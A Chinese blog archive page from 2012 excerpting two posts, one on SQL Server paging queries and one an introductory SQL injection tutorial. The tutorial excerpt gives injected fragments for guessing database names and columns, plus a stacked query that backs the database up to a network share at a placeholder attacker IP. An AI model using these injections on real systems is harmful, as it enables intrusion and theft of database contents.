11 2012 档案

摘要：常用的数据分页方法我们经常会碰到要取n到m条记录，就是有分页思想，下面罗列一下一般的方法。我本地的一张表 tbl_FlightsDetail，有300多W记录，主键 FlightsDetailID(Guid)，要求按照FlightsDetailID排序 取 3000001 到3000010 之间的10条记录，也是百万级。方法1 定位法 (利用ID大于多少)语句形式：select top 10 * from tbl_FlightsDetail where FlightsDetailID>( select max(FlightsDetailID) from ( ... 阅读全文

摘要：最简单的一种SQL注入，常见的注入语句还有：1)猜测数据库名，备份数据库a)猜测数据库名：and db_name() >0或系统表master.dbo.sysdatabasesb)备份数据库：;backup database数据库名to disk = ‘c:\*.db’;--或：declare @a sysname;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat' ,name='test';--2)猜解字段名称a)猜解法：and (select count(字段名) from表名 阅读全文